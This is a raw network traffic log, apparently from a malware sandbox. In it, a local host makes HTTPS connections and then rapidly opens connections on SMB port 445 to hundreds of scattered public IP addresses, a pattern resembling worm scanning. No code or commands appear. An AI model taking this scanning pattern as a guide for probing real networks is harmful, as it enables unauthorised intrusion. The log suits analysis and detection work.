Apr 29, 2023 00:52:19.025762081 CEST	49691	443	192.168.2.4	23.0.174.122
Apr 29, 2023 00:52:19.026035070 CEST	49691	443	192.168.2.4	23.0.174.122
Apr 29, 2023 00:52:19.026216030 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.026253939 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.026289940 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.026333094 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.026346922 CEST	49691	443	192.168.2.4	23.0.174.122
Apr 29, 2023 00:52:19.026396990 CEST	49691	443	192.168.2.4	23.0.174.122
Apr 29, 2023 00:52:19.026452065 CEST	49691	443	192.168.2.4	23.0.174.122
Apr 29, 2023 00:52:19.026704073 CEST	49691	443	192.168.2.4	23.0.174.122
Apr 29, 2023 00:52:19.026753902 CEST	49691	443	192.168.2.4	23.0.174.122
Apr 29, 2023 00:52:19.026822090 CEST	49691	443	192.168.2.4	23.0.174.122
Apr 29, 2023 00:52:19.027899981 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.027925014 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.027955055 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.028090000 CEST	49691	443	192.168.2.4	23.0.174.122
Apr 29, 2023 00:52:19.040206909 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.040261984 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.040968895 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.041043043 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.041075945 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.041271925 CEST	49691	443	192.168.2.4	23.0.174.122
Apr 29, 2023 00:52:19.041759014 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.041788101 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.041812897 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.041840076 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.041866064 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.041901112 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.041937113 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.041974068 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.042001963 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.042738914 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.042766094 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.043011904 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.043054104 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.043092966 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.043138981 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.043152094 CEST	49691	443	192.168.2.4	23.0.174.122
Apr 29, 2023 00:52:19.043224096 CEST	49691	443	192.168.2.4	23.0.174.122
Apr 29, 2023 00:52:19.245243073 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.245507002 CEST	49691	443	192.168.2.4	23.0.174.122
Apr 29, 2023 00:52:19.252106905 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.252326012 CEST	49691	443	192.168.2.4	23.0.174.122
Apr 29, 2023 00:52:25.176553011 CEST	49696	445	192.168.2.4	72.16.8.158
Apr 29, 2023 00:52:26.287204981 CEST	49710	445	192.168.2.4	184.113.58.151
Apr 29, 2023 00:52:27.144232035 CEST	49719	445	192.168.2.4	209.83.253.136
Apr 29, 2023 00:52:27.413428068 CEST	49722	445	192.168.2.4	101.179.29.185
Apr 29, 2023 00:52:28.256201029 CEST	49731	445	192.168.2.4	186.166.12.19
Apr 29, 2023 00:52:28.538213968 CEST	49735	445	192.168.2.4	33.90.140.130
Apr 29, 2023 00:52:29.152476072 CEST	49743	445	192.168.2.4	188.83.0.169
Apr 29, 2023 00:52:29.412453890 CEST	49746	445	192.168.2.4	122.132.99.87
Apr 29, 2023 00:52:29.662213087 CEST	49749	445	192.168.2.4	50.104.10.87
Apr 29, 2023 00:52:30.272646904 CEST	49758	445	192.168.2.4	92.235.114.0
Apr 29, 2023 00:52:30.537317991 CEST	49761	445	192.168.2.4	157.103.70.155
Apr 29, 2023 00:52:30.771826029 CEST	49764	445	192.168.2.4	73.246.184.154
Apr 29, 2023 00:52:31.164622068 CEST	49769	445	192.168.2.4	86.32.234.196
Apr 29, 2023 00:52:31.416591883 CEST	49773	445	192.168.2.4	39.172.248.169
Apr 29, 2023 00:52:31.664134979 CEST	49776	445	192.168.2.4	49.41.182.49
Apr 29, 2023 00:52:31.913746119 CEST	49779	445	192.168.2.4	38.137.250.147
Apr 29, 2023 00:52:32.287750959 CEST	49785	445	192.168.2.4	214.99.26.73
Apr 29, 2023 00:52:32.542779922 CEST	49789	445	192.168.2.4	69.159.246.37
Apr 29, 2023 00:52:32.772540092 CEST	49791	445	192.168.2.4	30.119.92.219
Apr 29, 2023 00:52:33.038295031 CEST	49795	445	192.168.2.4	47.12.84.116
Apr 29, 2023 00:52:33.180500984 CEST	49798	445	192.168.2.4	92.220.201.189
Apr 29, 2023 00:52:33.416776896 CEST	49801	445	192.168.2.4	97.192.118.14
Apr 29, 2023 00:52:33.662985086 CEST	49805	445	192.168.2.4	29.196.8.189
Apr 29, 2023 00:52:33.915852070 CEST	49808	445	192.168.2.4	111.0.120.250
Apr 29, 2023 00:52:34.162672997 CEST	49811	445	192.168.2.4	7.68.74.142
Apr 29, 2023 00:52:34.303556919 CEST	49814	445	192.168.2.4	22.9.249.138
Apr 29, 2023 00:52:34.538563013 CEST	49818	445	192.168.2.4	176.181.196.5
Apr 29, 2023 00:52:34.772866011 CEST	49821	445	192.168.2.4	89.192.116.13
Apr 29, 2023 00:52:35.037800074 CEST	49825	445	192.168.2.4	56.230.30.41
Apr 29, 2023 00:52:35.204912901 CEST	49827	445	192.168.2.4	21.128.229.2
Apr 29, 2023 00:52:35.288151026 CEST	49829	445	192.168.2.4	88.139.33.224
Apr 29, 2023 00:52:35.475336075 CEST	49832	445	192.168.2.4	215.9.90.175
Apr 29, 2023 00:52:35.678771973 CEST	49836	445	192.168.2.4	194.62.88.237
Apr 29, 2023 00:52:35.913258076 CEST	49838	445	192.168.2.4	70.175.246.167
Apr 29, 2023 00:52:36.162991047 CEST	49841	445	192.168.2.4	63.154.184.158
Apr 29, 2023 00:52:36.319693089 CEST	49844	445	192.168.2.4	98.92.163.39
Apr 29, 2023 00:52:36.413104057 CEST	49846	445	192.168.2.4	113.64.238.83
Apr 29, 2023 00:52:36.616600990 CEST	49850	445	192.168.2.4	47.53.26.233
Apr 29, 2023 00:52:36.804615021 CEST	49853	445	192.168.2.4	182.93.124.152
Apr 29, 2023 00:52:37.023262978 CEST	49855	445	192.168.2.4	94.37.146.213
Apr 29, 2023 00:52:37.213835955 CEST	49858	445	192.168.2.4	82.107.175.152
Apr 29, 2023 00:52:37.288544893 CEST	49860	445	192.168.2.4	126.33.24.229
Apr 29, 2023 00:52:37.460298061 CEST	49863	445	192.168.2.4	81.4.106.147
Apr 29, 2023 00:52:37.488528967 CEST	445	49863	81.4.106.147	192.168.2.4
Apr 29, 2023 00:52:37.549817085 CEST	49865	445	192.168.2.4	103.152.242.90
Apr 29, 2023 00:52:37.812179089 CEST	49867	445	192.168.2.4	152.106.251.102
Apr 29, 2023 00:52:37.990628004 CEST	49863	445	192.168.2.4	81.4.106.147
Apr 29, 2023 00:52:38.018764973 CEST	445	49863	81.4.106.147	192.168.2.4
Apr 29, 2023 00:52:38.080537081 CEST	49869	445	192.168.2.4	129.49.165.170
Apr 29, 2023 00:52:38.281721115 CEST	49872	445	192.168.2.4	74.155.99.194
Apr 29, 2023 00:52:38.413543940 CEST	49875	445	192.168.2.4	47.71.119.210
Apr 29, 2023 00:52:38.414216042 CEST	49876	445	192.168.2.4	118.55.116.152
Apr 29, 2023 00:52:38.632055998 CEST	49879	445	192.168.2.4	106.1.214.254
Apr 29, 2023 00:52:38.725822926 CEST	49880	445	192.168.2.4	5.164.67.168
Apr 29, 2023 00:52:39.466424942 CEST	49884	445	192.168.2.4	48.196.99.194
Apr 29, 2023 00:52:39.473402977 CEST	49886	445	192.168.2.4	202.222.224.178
Apr 29, 2023 00:52:39.630597115 CEST	49888	445	192.168.2.4	119.108.213.142
Apr 29, 2023 00:52:39.631268024 CEST	49889	445	192.168.2.4	1.143.104.190
Apr 29, 2023 00:52:39.675280094 CEST	49890	445	192.168.2.4	14.12.217.242
Apr 29, 2023 00:52:39.675941944 CEST	49891	445	192.168.2.4	158.198.42.111
Apr 29, 2023 00:52:39.788330078 CEST	49894	445	192.168.2.4	207.122.188.132
Apr 29, 2023 00:52:39.866509914 CEST	49896	445	192.168.2.4	73.80.114.142
Apr 29, 2023 00:52:40.012849092 CEST	80	49692	8.238.88.126	192.168.2.4
Apr 29, 2023 00:52:40.013008118 CEST	49692	80	192.168.2.4	8.238.88.126
Apr 29, 2023 00:52:41.108700991 CEST	49902	445	192.168.2.4	184.1.46.68
Apr 29, 2023 00:52:41.109256983 CEST	49903	445	192.168.2.4	198.200.224.177
Apr 29, 2023 00:52:41.109772921 CEST	49904	445	192.168.2.4	106.176.160.100
Apr 29, 2023 00:52:41.110296011 CEST	49905	445	192.168.2.4	207.66.210.127
Apr 29, 2023 00:52:41.110738039 CEST	49906	445	192.168.2.4	88.208.119.107
Apr 29, 2023 00:52:41.111104965 CEST	49907	445	192.168.2.4	136.232.34.85
Apr 29, 2023 00:52:41.112009048 CEST	49908	445	192.168.2.4	36.106.64.248
Apr 29, 2023 00:52:41.112165928 CEST	49909	445	192.168.2.4	182.55.31.198
Apr 29, 2023 00:52:41.281749010 CEST	445	49907	136.232.34.85	192.168.2.4
Apr 29, 2023 00:52:41.477216959 CEST	49914	445	192.168.2.4	53.140.148.14
Apr 29, 2023 00:52:41.946072102 CEST	49907	445	192.168.2.4	136.232.34.85
Apr 29, 2023 00:52:42.118697882 CEST	445	49907	136.232.34.85	192.168.2.4
Apr 29, 2023 00:52:42.210695028 CEST	49922	445	192.168.2.4	176.239.155.57
Apr 29, 2023 00:52:42.226284027 CEST	49923	445	192.168.2.4	158.116.9.87
Apr 29, 2023 00:52:42.226948023 CEST	49924	445	192.168.2.4	23.86.189.131
Apr 29, 2023 00:52:42.228688955 CEST	49925	445	192.168.2.4	96.221.53.7
Apr 29, 2023 00:52:42.231223106 CEST	49926	445	192.168.2.4	119.136.218.213
Apr 29, 2023 00:52:42.233799934 CEST	49927	445	192.168.2.4	101.171.226.199
Apr 29, 2023 00:52:42.236334085 CEST	49928	445	192.168.2.4	126.228.55.66
Apr 29, 2023 00:52:42.238601923 CEST	49929	445	192.168.2.4	36.25.218.102
Apr 29, 2023 00:52:42.614356041 CEST	49935	445	192.168.2.4	75.160.200.109
Apr 29, 2023 00:52:43.335438967 CEST	49943	445	192.168.2.4	134.111.99.242
Apr 29, 2023 00:52:43.369801998 CEST	49944	445	192.168.2.4	203.127.109.151
Apr 29, 2023 00:52:43.370310068 CEST	49945	445	192.168.2.4	133.4.90.107
Apr 29, 2023 00:52:43.372253895 CEST	49946	445	192.168.2.4	44.149.36.233
Apr 29, 2023 00:52:43.372518063 CEST	49947	445	192.168.2.4	137.133.254.54
Apr 29, 2023 00:52:43.372538090 CEST	49948	445	192.168.2.4	46.106.116.212
Apr 29, 2023 00:52:43.372706890 CEST	49949	445	192.168.2.4	132.212.16.231
Apr 29, 2023 00:52:43.372723103 CEST	49950	445	192.168.2.4	176.58.242.214
Apr 29, 2023 00:52:43.494621992 CEST	49953	445	192.168.2.4	143.32.64.133
Apr 29, 2023 00:52:43.726310968 CEST	49956	445	192.168.2.4	118.122.224.96
Apr 29, 2023 00:52:44.478773117 CEST	49964	445	192.168.2.4	193.70.176.157
Apr 29, 2023 00:52:44.493738890 CEST	49966	445	192.168.2.4	204.84.132.21
Apr 29, 2023 00:52:44.493912935 CEST	49967	445	192.168.2.4	207.117.78.127
Apr 29, 2023 00:52:44.494062901 CEST	49968	445	192.168.2.4	19.144.240.51
Apr 29, 2023 00:52:44.494119883 CEST	49969	445	192.168.2.4	207.25.204.102
Apr 29, 2023 00:52:44.494235039 CEST	49970	445	192.168.2.4	22.185.201.161
Apr 29, 2023 00:52:44.494319916 CEST	49971	445	192.168.2.4	22.248.212.216
Apr 29, 2023 00:52:44.494504929 CEST	49972	445	192.168.2.4	185.178.25.169
Apr 29, 2023 00:52:44.616821051 CEST	49974	445	192.168.2.4	43.125.152.165
Apr 29, 2023 00:52:44.835649967 CEST	49978	445	192.168.2.4	82.99.130.13
Apr 29, 2023 00:52:45.510776043 CEST	49985	445	192.168.2.4	194.99.10.146
Apr 29, 2023 00:52:45.602965117 CEST	49987	445	192.168.2.4	152.112.91.28
Apr 29, 2023 00:52:45.617285013 CEST	49988	445	192.168.2.4	30.119.249.231
Apr 29, 2023 00:52:45.618132114 CEST	49989	445	192.168.2.4	211.87.233.189
Apr 29, 2023 00:52:45.618904114 CEST	49990	445	192.168.2.4	55.155.181.170
Apr 29, 2023 00:52:45.619801998 CEST	49991	445	192.168.2.4	66.124.93.183
Apr 29, 2023 00:52:45.621342897 CEST	49993	445	192.168.2.4	14.49.5.13
Apr 29, 2023 00:52:45.621361971 CEST	49992	445	192.168.2.4	84.54.205.141
Apr 29, 2023 00:52:45.621530056 CEST	49994	445	192.168.2.4	38.221.40.253
Apr 29, 2023 00:52:45.742408037 CEST	49997	445	192.168.2.4	183.154.30.88
Apr 29, 2023 00:52:45.960208893 CEST	50000	445	192.168.2.4	199.92.189.122
Apr 29, 2023 00:52:46.617487907 CEST	50007	445	192.168.2.4	23.106.15.76
Apr 29, 2023 00:52:46.726927996 CEST	50009	445	192.168.2.4	89.140.178.184
Apr 29, 2023 00:52:46.727709055 CEST	50010	445	192.168.2.4	17.67.65.215
Apr 29, 2023 00:52:46.728708029 CEST	50011	445	192.168.2.4	31.90.172.237
Apr 29, 2023 00:52:46.729680061 CEST	50012	445	192.168.2.4	101.63.63.96
Apr 29, 2023 00:52:46.730580091 CEST	50013	445	192.168.2.4	30.104.247.47
Apr 29, 2023 00:52:46.731483936 CEST	50014	445	192.168.2.4	180.47.174.111
Apr 29, 2023 00:52:46.732364893 CEST	50015	445	192.168.2.4	177.136.115.217
Apr 29, 2023 00:52:46.732741117 CEST	50016	445	192.168.2.4	110.97.126.35
Apr 29, 2023 00:52:46.867265940 CEST	50019	445	192.168.2.4	3.49.38.67
Apr 29, 2023 00:52:47.085975885 CEST	50022	445	192.168.2.4	114.97.56.34
Apr 29, 2023 00:52:47.526187897 CEST	50027	445	192.168.2.4	94.166.42.201
Apr 29, 2023 00:52:47.743736982 CEST	50031	445	192.168.2.4	154.115.58.180
Apr 29, 2023 00:52:47.851564884 CEST	50033	445	192.168.2.4	193.172.168.250
Apr 29, 2023 00:52:47.867974997 CEST	50034	445	192.168.2.4	157.20.246.141
Apr 29, 2023 00:52:47.868566036 CEST	50035	445	192.168.2.4	98.105.212.231
Apr 29, 2023 00:52:47.869024038 CEST	50036	445	192.168.2.4	72.58.236.35
Apr 29, 2023 00:52:47.869716883 CEST	50037	445	192.168.2.4	91.239.134.54
Apr 29, 2023 00:52:47.870130062 CEST	50038	445	192.168.2.4	163.18.134.45
Apr 29, 2023 00:52:47.870707035 CEST	50039	445	192.168.2.4	7.187.25.23
Apr 29, 2023 00:52:47.871154070 CEST	50040	445	192.168.2.4	160.238.52.131
Apr 29, 2023 00:52:47.929373980 CEST	445	50037	91.239.134.54	192.168.2.4
Apr 29, 2023 00:52:48.007364988 CEST	50043	445	192.168.2.4	96.149.144.240
Apr 29, 2023 00:52:48.223290920 CEST	50046	445	192.168.2.4	174.219.14.191
Apr 29, 2023 00:52:48.428965092 CEST	50037	445	192.168.2.4	91.239.134.54
Apr 29, 2023 00:52:48.486624002 CEST	445	50037	91.239.134.54	192.168.2.4
Apr 29, 2023 00:52:48.655251980 CEST	50051	445	192.168.2.4	181.101.25.77
Apr 29, 2023 00:52:48.867758989 CEST	50054	445	192.168.2.4	124.107.114.93
Apr 29, 2023 00:52:48.976227999 CEST	50056	445	192.168.2.4	155.114.11.225
Apr 29, 2023 00:52:48.978982925 CEST	50057	445	192.168.2.4	6.182.152.38
Apr 29, 2023 00:52:48.979016066 CEST	50058	445	192.168.2.4	39.76.170.80
Apr 29, 2023 00:52:48.979239941 CEST	50059	445	192.168.2.4	216.56.213.5
Apr 29, 2023 00:52:48.979324102 CEST	50061	445	192.168.2.4	78.157.105.34
Apr 29, 2023 00:52:48.979413033 CEST	50062	445	192.168.2.4	25.188.161.31
Apr 29, 2023 00:52:48.979430914 CEST	50060	445	192.168.2.4	121.152.106.167
Apr 29, 2023 00:52:48.979562998 CEST	50063	445	192.168.2.4	103.80.219.50
Apr 29, 2023 00:52:49.117585897 CEST	50066	445	192.168.2.4	14.82.56.141
Apr 29, 2023 00:52:49.320521116 CEST	50069	445	192.168.2.4	97.216.199.3
Apr 29, 2023 00:52:49.498023033 CEST	445	50051	181.101.25.77	192.168.2.4
Apr 29, 2023 00:52:49.539285898 CEST	50073	445	192.168.2.4	71.2.48.14
Apr 29, 2023 00:52:49.757924080 CEST	50075	445	192.168.2.4	114.188.136.246
Apr 29, 2023 00:52:49.993691921 CEST	50078	445	192.168.2.4	217.176.77.32
Apr 29, 2023 00:52:50.101819038 CEST	50081	445	192.168.2.4	28.238.38.48
Apr 29, 2023 00:52:50.119544029 CEST	50083	445	192.168.2.4	38.62.104.43
Apr 29, 2023 00:52:50.119571924 CEST	50082	445	192.168.2.4	107.72.112.39
Apr 29, 2023 00:52:50.119636059 CEST	50084	445	192.168.2.4	113.196.129.81
Apr 29, 2023 00:52:50.119698048 CEST	50085	445	192.168.2.4	78.149.120.118
Apr 29, 2023 00:52:50.119776964 CEST	50086	445	192.168.2.4	106.31.80.54
Apr 29, 2023 00:52:50.119776011 CEST	50087	445	192.168.2.4	35.24.155.5
Apr 29, 2023 00:52:50.119843006 CEST	50088	445	192.168.2.4	57.43.122.202
Apr 29, 2023 00:52:50.242266893 CEST	50091	445	192.168.2.4	44.251.184.221
Apr 29, 2023 00:52:50.445080042 CEST	50094	445	192.168.2.4	139.37.227.95
Apr 29, 2023 00:52:50.682970047 CEST	50097	445	192.168.2.4	196.129.71.147
Apr 29, 2023 00:52:50.882734060 CEST	50100	445	192.168.2.4	211.249.145.35
Apr 29, 2023 00:52:51.101341009 CEST	50103	445	192.168.2.4	26.220.146.63
Apr 29, 2023 00:52:51.227430105 CEST	50105	445	192.168.2.4	106.202.72.237
Apr 29, 2023 00:52:51.245003939 CEST	50107	445	192.168.2.4	94.138.159.145
Apr 29, 2023 00:52:51.245223045 CEST	50109	445	192.168.2.4	47.191.140.244
Apr 29, 2023 00:52:51.245239019 CEST	50108	445	192.168.2.4	16.157.77.129
Apr 29, 2023 00:52:51.245273113 CEST	50110	445	192.168.2.4	86.12.172.82
Apr 29, 2023 00:52:51.245352983 CEST	50111	445	192.168.2.4	123.31.196.86
Apr 29, 2023 00:52:51.245358944 CEST	50112	445	192.168.2.4	160.99.63.211
Apr 29, 2023 00:52:51.245438099 CEST	50113	445	192.168.2.4	91.26.174.140
Apr 29, 2023 00:52:51.367588997 CEST	50115	445	192.168.2.4	137.40.58.221
Apr 29, 2023 00:52:51.559770107 CEST	50118	445	192.168.2.4	201.204.58.55
Apr 29, 2023 00:52:51.570400953 CEST	50119	445	192.168.2.4	129.99.70.106
Apr 29, 2023 00:52:51.806237936 CEST	50122	445	192.168.2.4	45.111.114.65
Apr 29, 2023 00:52:52.007941961 CEST	50125	445	192.168.2.4	87.194.164.204
Apr 29, 2023 00:52:52.226643085 CEST	50126	445	192.168.2.4	199.217.96.22
Apr 29, 2023 00:52:52.339838028 CEST	50127	445	192.168.2.4	3.251.109.161
Apr 29, 2023 00:52:52.395586014 CEST	50128	445	192.168.2.4	171.173.226.35
Apr 29, 2023 00:52:52.396888971 CEST	50129	445	192.168.2.4	121.229.56.206
Apr 29, 2023 00:52:52.397564888 CEST	50130	445	192.168.2.4	10.60.61.5
Apr 29, 2023 00:52:52.399873018 CEST	50132	445	192.168.2.4	64.231.164.67
Apr 29, 2023 00:52:52.400614977 CEST	50133	445	192.168.2.4	41.109.173.189
Apr 29, 2023 00:52:52.401473999 CEST	50134	445	192.168.2.4	11.135.183.36
Apr 29, 2023 00:52:52.507812023 CEST	50135	445	192.168.2.4	15.36.104.250
Apr 29, 2023 00:52:52.664120913 CEST	50136	445	192.168.2.4	72.163.112.167
Apr 29, 2023 00:52:52.695694923 CEST	50137	445	192.168.2.4	89.13.205.245
Apr 29, 2023 00:52:52.930476904 CEST	50138	445	192.168.2.4	144.100.162.62
Apr 29, 2023 00:52:53.133066893 CEST	50139	445	192.168.2.4	139.28.243.181
Apr 29, 2023 00:52:53.352010965 CEST	50140	445	192.168.2.4	87.213.211.209
Apr 29, 2023 00:52:53.445748091 CEST	50141	445	192.168.2.4	64.107.133.187
Apr 29, 2023 00:52:53.509526968 CEST	50144	445	192.168.2.4	167.168.15.241
Apr 29, 2023 00:52:53.509526968 CEST	50143	445	192.168.2.4	82.111.49.165
Apr 29, 2023 00:52:53.509744883 CEST	50142	445	192.168.2.4	79.22.195.222
Apr 29, 2023 00:52:53.524770975 CEST	50145	445	192.168.2.4	192.93.137.151
Apr 29, 2023 00:52:53.525427103 CEST	50146	445	192.168.2.4	152.187.35.13
Apr 29, 2023 00:52:53.526047945 CEST	50147	445	192.168.2.4	79.91.131.25
Apr 29, 2023 00:52:53.526875973 CEST	50148	445	192.168.2.4	162.248.122.160
Apr 29, 2023 00:52:53.571238995 CEST	50149	445	192.168.2.4	149.109.62.251
Apr 29, 2023 00:52:53.617536068 CEST	50150	445	192.168.2.4	121.206.190.43
Apr 29, 2023 00:52:53.773684025 CEST	50151	445	192.168.2.4	189.12.86.188
Apr 29, 2023 00:52:53.822803974 CEST	50152	445	192.168.2.4	186.89.114.136
Apr 29, 2023 00:52:54.054745913 CEST	50153	445	192.168.2.4	45.128.224.16
Apr 29, 2023 00:52:54.257930994 CEST	50154	445	192.168.2.4	160.167.234.141
Apr 29, 2023 00:52:54.477015972 CEST	50155	445	192.168.2.4	37.230.90.18
Apr 29, 2023 00:52:54.586237907 CEST	50156	445	192.168.2.4	106.72.33.44
Apr 29, 2023 00:52:54.667077065 CEST	50157	445	192.168.2.4	164.56.153.16
Apr 29, 2023 00:52:54.667254925 CEST	50158	445	192.168.2.4	92.251.140.232
Apr 29, 2023 00:52:54.667382002 CEST	50159	445	192.168.2.4	215.99.33.78
Apr 29, 2023 00:52:54.667458057 CEST	50160	445	192.168.2.4	155.111.196.111
Apr 29, 2023 00:52:54.667561054 CEST	50161	445	192.168.2.4	141.251.176.184
Apr 29, 2023 00:52:54.667619944 CEST	50162	445	192.168.2.4	71.114.244.149
Apr 29, 2023 00:52:54.667819023 CEST	50163	445	192.168.2.4	163.51.7.200
Apr 29, 2023 00:52:54.695607901 CEST	50164	445	192.168.2.4	186.157.21.95
Apr 29, 2023 00:52:54.742739916 CEST	50165	445	192.168.2.4	180.20.130.89
Apr 29, 2023 00:52:54.899317980 CEST	50166	445	192.168.2.4	141.180.157.221
Apr 29, 2023 00:52:54.929866076 CEST	50167	445	192.168.2.4	44.245.49.123
Apr 29, 2023 00:52:55.367301941 CEST	50169	445	192.168.2.4	177.37.237.63
Apr 29, 2023 00:52:55.586035967 CEST	50170	445	192.168.2.4	72.127.98.221
Apr 29, 2023 00:52:55.586664915 CEST	50171	445	192.168.2.4	96.174.254.6
Apr 29, 2023 00:52:55.711313963 CEST	50172	445	192.168.2.4	94.243.54.179
Apr 29, 2023 00:52:55.791269064 CEST	50173	445	192.168.2.4	1.236.7.194
Apr 29, 2023 00:52:55.791485071 CEST	50174	445	192.168.2.4	107.239.23.27
Apr 29, 2023 00:52:55.791855097 CEST	50176	445	192.168.2.4	98.217.77.151
Apr 29, 2023 00:52:55.791908979 CEST	50177	445	192.168.2.4	186.55.53.164
Apr 29, 2023 00:52:55.791973114 CEST	50178	445	192.168.2.4	87.6.188.46
Apr 29, 2023 00:52:55.792027950 CEST	50179	445	192.168.2.4	10.241.217.129
Apr 29, 2023 00:52:55.792268991 CEST	50175	445	192.168.2.4	95.154.64.13
Apr 29, 2023 00:52:55.804845095 CEST	50180	445	192.168.2.4	66.51.189.236
Apr 29, 2023 00:52:55.837564945 CEST	445	50178	87.6.188.46	192.168.2.4
Apr 29, 2023 00:52:55.867779970 CEST	50181	445	192.168.2.4	167.23.165.235
Apr 29, 2023 00:52:56.007992029 CEST	50182	445	192.168.2.4	161.133.152.117
Apr 29, 2023 00:52:56.055260897 CEST	50183	445	192.168.2.4	48.52.209.231
Apr 29, 2023 00:52:56.305741072 CEST	50184	445	192.168.2.4	72.185.85.117
Apr 29, 2023 00:52:56.351525068 CEST	50178	445	192.168.2.4	87.6.188.46
Apr 29, 2023 00:52:56.396470070 CEST	445	50178	87.6.188.46	192.168.2.4
Apr 29, 2023 00:52:56.492511034 CEST	50185	445	192.168.2.4	113.13.197.195
Apr 29, 2023 00:52:56.874123096 CEST	50187	445	192.168.2.4	176.229.140.232
Apr 29, 2023 00:52:56.874128103 CEST	50186	445	192.168.2.4	27.112.32.121
Apr 29, 2023 00:52:56.982620001 CEST	50188	445	192.168.2.4	77.176.189.128
Apr 29, 2023 00:52:56.982624054 CEST	50189	445	192.168.2.4	190.154.78.39
Apr 29, 2023 00:52:56.983103991 CEST	50190	445	192.168.2.4	216.247.42.234
Apr 29, 2023 00:52:56.983745098 CEST	50191	445	192.168.2.4	82.168.57.98
Apr 29, 2023 00:52:56.984209061 CEST	50192	445	192.168.2.4	103.196.1.90
Apr 29, 2023 00:52:56.984853983 CEST	50193	445	192.168.2.4	161.63.160.205
Apr 29, 2023 00:52:56.985342026 CEST	50194	445	192.168.2.4	217.91.181.91
Apr 29, 2023 00:52:56.986078024 CEST	50195	445	192.168.2.4	208.75.16.242
Apr 29, 2023 00:52:56.986509085 CEST	50196	445	192.168.2.4	7.23.182.234
Apr 29, 2023 00:52:56.986906052 CEST	50197	445	192.168.2.4	172.235.59.140
Apr 29, 2023 00:52:57.031430960 CEST	445	50194	217.91.181.91	192.168.2.4
Apr 29, 2023 00:52:57.164510965 CEST	50198	445	192.168.2.4	124.116.113.78
Apr 29, 2023 00:52:57.180417061 CEST	50199	445	192.168.2.4	134.206.203.110
Apr 29, 2023 00:52:57.477170944 CEST	50200	445	192.168.2.4	71.141.224.137
Apr 29, 2023 00:52:57.539114952 CEST	50194	445	192.168.2.4	217.91.181.91
Apr 29, 2023 00:52:57.585449934 CEST	445	50194	217.91.181.91	192.168.2.4
Apr 29, 2023 00:52:57.603646040 CEST	50201	445	192.168.2.4	64.237.124.89
Apr 29, 2023 00:52:57.604794025 CEST	50202	445	192.168.2.4	137.80.230.3
Apr 29, 2023 00:52:58.086076975 CEST	50194	445	192.168.2.4	217.91.181.91
Apr 29, 2023 00:52:58.132492065 CEST	445	50194	217.91.181.91	192.168.2.4
Apr 29, 2023 00:52:58.310558081 CEST	50203	445	192.168.2.4	12.18.188.47
Apr 29, 2023 00:52:58.310573101 CEST	50204	445	192.168.2.4	7.101.226.59
Apr 29, 2023 00:52:58.310676098 CEST	50205	445	192.168.2.4	51.134.110.107
Apr 29, 2023 00:52:58.311642885 CEST	50206	445	192.168.2.4	95.223.91.128
Apr 29, 2023 00:52:58.311928034 CEST	50207	445	192.168.2.4	166.207.201.65
Apr 29, 2023 00:52:58.312572956 CEST	50208	445	192.168.2.4	1.63.16.62
Apr 29, 2023 00:52:58.313328981 CEST	50209	445	192.168.2.4	190.136.254.228
Apr 29, 2023 00:52:58.314308882 CEST	50210	445	192.168.2.4	135.68.167.96
Apr 29, 2023 00:52:58.315181017 CEST	50211	445	192.168.2.4	200.112.246.251
Apr 29, 2023 00:52:58.315979958 CEST	50212	445	192.168.2.4	185.6.155.175
Apr 29, 2023 00:52:58.316446066 CEST	50213	445	192.168.2.4	205.188.131.157
Apr 29, 2023 00:52:58.316847086 CEST	50214	445	192.168.2.4	65.25.8.250
Apr 29, 2023 00:52:58.317341089 CEST	50215	445	192.168.2.4	135.228.14.167
Apr 29, 2023 00:52:58.317523003 CEST	50216	445	192.168.2.4	191.229.42.64
Apr 29, 2023 00:52:58.618545055 CEST	50217	445	192.168.2.4	209.101.217.230
Apr 29, 2023 00:52:58.799002886 CEST	50218	445	192.168.2.4	11.159.61.43
Apr 29, 2023 00:52:59.456228018 CEST	50219	445	192.168.2.4	113.183.34.234
Apr 29, 2023 00:52:59.561558962 CEST	50220	445	192.168.2.4	50.248.104.166
Apr 29, 2023 00:52:59.561593056 CEST	50221	445	192.168.2.4	182.64.63.96
Apr 29, 2023 00:52:59.561784983 CEST	50222	445	192.168.2.4	43.182.120.133
Apr 29, 2023 00:52:59.561959028 CEST	50223	445	192.168.2.4	99.120.201.53
Apr 29, 2023 00:52:59.629303932 CEST	50224	445	192.168.2.4	34.109.46.86
Apr 29, 2023 00:52:59.629365921 CEST	50225	445	192.168.2.4	128.103.254.232
